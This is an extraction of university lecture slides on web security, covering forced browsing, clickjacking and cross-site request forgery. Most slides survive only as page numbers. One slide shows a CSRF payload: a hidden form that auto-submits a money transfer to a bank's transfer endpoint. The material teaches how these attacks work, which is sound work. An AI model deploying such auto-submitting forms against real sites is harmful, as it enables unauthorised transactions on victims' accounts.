Software and Web Security 2
Forced/forceful browsing
sws2 1
Forced/forceful browsing sws2 1 Forced browsing (not in book!) - - PowerPoint PPT Presentation
Software and Web Security 2 Forced/forceful browsing sws2 1 Forced browsing (not in book!) Supplying a URL directly (forcing the URL) rather than by accessing it by following links from other pages Modify (numerical) value in known
sws2 1
sws2 2
sws2 3
https://www.onlinebank.com/user/getAccounts https://www.onlinebank.com/user/getAccounts
4 sws2
Movie on brute-force forceful browsing at http://www.secure-abap.de/wiki/Movies
5 sws2
sws2 6
sws2 7
sws2 8
Demo: see http://www.cs.ru.nl/~erikpoll/sws2/demo/clickjack_basic.html
sws2 9
sws2 10
Demos
sws2 11
sws2 12
sws2 13
sws2 14
sws2 15
sws2 16
For an example, you can try the Blackboard webpage, which uses JavaScript to bust frames, eg http://www.cs.ru.nl/~erikpoll/sws2/demo/clickjack_bb_using_UI_redressing.html
sws2 17
sws2 18
sws2 19
sws2 20
sws2 21
sws2 22
sws2 23
sws2 24
sws2 25
<img> tag loaded by browser – sends GET request (including credentials) to vulnerable site
Custom Code Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce
Hidden <img> tag contains attack against vulnerable site
26 sws2
sws2 27
<form action=”transfer.php” method=”POST”> To: <input type=”text” name=”to”/> Amount: <input type=”text” name=”amount”/> <input type=”submit” value=”Submit”/> </form>
<form action=”http://bank.com/transfer.php” method=”POST”> <input type=”hidden” name=”to” value=”52.12.57.762”/> <input type=”hidden” name=”amount” value=”1000” /> <input type=”submit”/> </form> <script> document.forms[0].submit(); </script>
sws2 28
sws2 29
sws2 30
sws2 31
sws2 32
sws2 33
sws2 34
sws2 35
sws2 36
Movie on XSS/CSRF at http://www.secure-abap.de/wiki/Movies
sws2 37
sws2 38